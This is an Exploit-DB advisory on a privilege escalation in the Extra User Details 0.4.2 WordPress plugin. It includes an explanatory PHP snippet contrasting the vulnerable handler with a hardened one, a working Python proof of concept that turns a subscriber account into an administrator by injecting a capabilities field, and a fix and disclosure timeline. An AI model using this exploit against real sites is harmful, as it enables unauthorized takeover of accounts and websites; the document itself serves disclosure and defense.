WordPress Plugin Extra User Details 0.4.2 – Privilege Escalation

  • Author: Panagiotis Vagenas
    Date: 2016-02-24
  • Category: WebApps
    Platform:
  • Source: https://www.exploit-db.com/exploits/39489/
    * Exploit Title: Extra User Details [Privilege Escalation]
    * Discovery Date: 2016-02-13
    * Exploit Author: Panagiotis Vagenas
    * Author Link: https://twitter.com/panVagenas
    * Vendor Homepage: http://vadimk.com/
    * Software Link: https://wordpress.org/plugins/extra-user-details/
    * Version: 0.4.2
    * Tested on: WordPress 4.4.2
    * Category: WebApps, WordPress
    
    
    Description
    -----------
    
    _Extra User Details_ plugin for WordPress suffers from a Privilege
    Escalation vulnerability.
    
    The plugin hooks the `eud_update_ExtraFields` function to the `profile_update`
    WordPress action. This function doesn't properly check user capabilities and
    writes every value passed in POST data to user meta. The only condition is
    that the POST variable name has the `eud` prefix, which is stripped before
    the value is stored in the database; the remainder of the name is used
    verbatim as the meta key.
    
    Because `profile_update` fires whenever a logged-in user saves their own
    profile, any low-privileged account can exploit this misbehavior to update
    the `{prefix}_capabilities` meta entry and gain administrative privileges.
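    
    To make the described pattern concrete, the following is an added illustration
    (not the plugin's source code) of a `profile_update` handler that behaves the way
    the advisory describes, beside a hardened version. WordPress's `profile_update`
    hook, `update_user_meta`, `current_user_can`, `sanitize_key`, `sanitize_text_field`
    and `wp_unslash` are real core APIs; the `example_eud_*` function names and the
    `example_eud_fields` option are assumptions made for this example.
    
    ```php
    <?php
    // Added example: the vulnerable pattern described in the advisory and a
    // hardened version. This is NOT the plugin's code; names are illustrative.
    
    // Vulnerable: any POST key starting with 'eud' becomes a user meta key once
    // the prefix is stripped, so 'eudwp_capabilities[administrator]' writes
    // {prefix}capabilities and assigns the administrator role.
    function example_eud_update_vulnerable( $user_id ) {
        foreach ( $_POST as $key => $value ) {
            if ( strpos( $key, 'eud' ) === 0 ) {
                update_user_meta( $user_id, substr( $key, 3 ), $value );
            }
        }
    }
    
    // Hardened: only the field names an administrator configured for the plugin
    // may be written, values are reduced to sanitized scalars, and keys that
    // control authorization are refused even if they were somehow configured.
    function example_eud_update_hardened( $user_id ) {
        // Assumed option holding the configured extra-field keys, for example
        // array( 'phone', 'department' ). Real plugin storage may differ.
        $allowed = (array) get_option( 'example_eud_fields', array() );
    
        // profile.php has already verified the update-user_{id} nonce before
        // profile_update fires; this check only rejects edits of other users.
        if ( ! current_user_can( 'edit_user', $user_id ) ) {
            return;
        }
    
        foreach ( $allowed as $field ) {
            $field = sanitize_key( $field );
            if ( '' === $field || example_eud_is_reserved_key( $field ) ) {
                continue;
            }
            $post_key = 'eud' . $field;
            // Arrays are refused: the exploit relies on an array value being
            // serialized into the capabilities meta entry.
            if ( ! isset( $_POST[ $post_key ] ) || is_array( $_POST[ $post_key ] ) ) {
                continue;
            }
            $value = sanitize_text_field( wp_unslash( $_POST[ $post_key ] ) );
            update_user_meta( $user_id, $field, $value );
        }
    }
    
    // Meta keys that decide what a user may do must never be writable from
    // profile form data, whatever the configured field list says.
    function example_eud_is_reserved_key( $key ) {
        global $wpdb;
        $prefix   = isset( $wpdb ) ? $wpdb->prefix : 'wp_';
        $reserved = array(
            $prefix . 'capabilities',
            $prefix . 'user_level',
            'session_tokens',
        );
        // Keys beginning with '_' are private meta and are refused as well.
        return in_array( $key, $reserved, true ) || substr( $key, 0, 1 ) === '_';
    }
    
    add_action( 'profile_update', 'example_eud_update_hardened' );
    ```
    
    Note that a capability check alone does not close the hole: WordPress maps
    `current_user_can( 'edit_user', $user_id )` to true for a user editing their own
    profile, which is exactly the request the exploit sends. The essential part of the
    fix is that the meta key comes from a server-side allowlist rather than from the
    name of a POST variable.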
    
    PoC
    ---
    
    In the following PoC we assume that the database has the `wp` prefix, a very
    common scenario as this is the default WordPress value. The script logs in as
    any low-privileged account, fetches that account's own profile form (which
    supplies the `_wpnonce` and the other hidden fields WordPress expects on a
    profile save), and resubmits it with an extra `eudwp_capabilities[administrator]`
    field.
    
    ```python
    #!/usr/bin/python3
    
    ################################################################################
    # Extra User Details Privilege Escalation Exploit
    #
    # Author: Panagiotis Vagenas <pan.vagenas>
    #
    # Dependencies: BeautifulSoup (http://www.crummy.com/software/BeautifulSoup/)
    ################################################################################
    
    import sys
    
    import requests
    from bs4 import BeautifulSoup
    
    baseUrl = 'http://example.com'
    loginUrl = baseUrl + '/wp-login.php'
    profileUrl = baseUrl + '/wp-admin/profile.php'
    
    # Credentials of any low-privileged account (a subscriber is enough)
    loginPostData = {
        'log': 'username',
        'pwd': 'password',
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }
    
    s = requests.Session()
    
    r = s.post(loginUrl, loginPostData)
    
    # wp-login.php also answers 200 for a failed login, so additionally require
    # the wordpress_logged_in_* auth cookie that only a successful login sets
    if r.status_code != 200 or not any(
            c.name.startswith('wordpress_logged_in') for c in s.cookies):
        print('Login error')
        sys.exit(1)
    
    # Fetch the profile page to collect the form's existing fields, including
    # the _wpnonce that WordPress checks before the profile_update action fires
    r = s.get(profileUrl)
    soup = BeautifulSoup(r.text, 'html.parser')
    
    f = soup.find('form', {'id': 'your-profile'})
    if not f:
        print('Error: profile form not found')
        sys.exit(1)
    
    # The plugin strips the 'eud' prefix and uses the rest as the meta key, so
    # this field is stored as wp_capabilities => array('administrator' => 1)
    data = {
        'eudwp_capabilities[administrator]': 1,
    }
    
    # Replay every populated input of the original form so the request looks
    # like a normal profile save to WordPress
    for i in f.find_all('input'):
        if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
            data[i.attrs['name']] = i.attrs['value']
    
    r = s.post(profileUrl, data)
    
    if r.status_code == 200:
        print('Success')
    
    sys.exit(0)
    ```
    
    Solution
    --------
    
    Upgrade to v0.4.2.1. Upgrading does not undo changes already made through the
    vulnerable handler, so sites that ran v0.4.2 should also review the
    `{prefix}_capabilities` entries in the usermeta table for accounts that were
    unexpectedly granted the administrator role.
    
    Timeline
    --------
    
    1. **2016-02-13**: Vendor notified through wordpress.org support forums
    2. **2016-02-13**: Vendor notified through the contact form on his website
    3. **2016-02-13**: Vendor responded and received details about this issue
    4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
    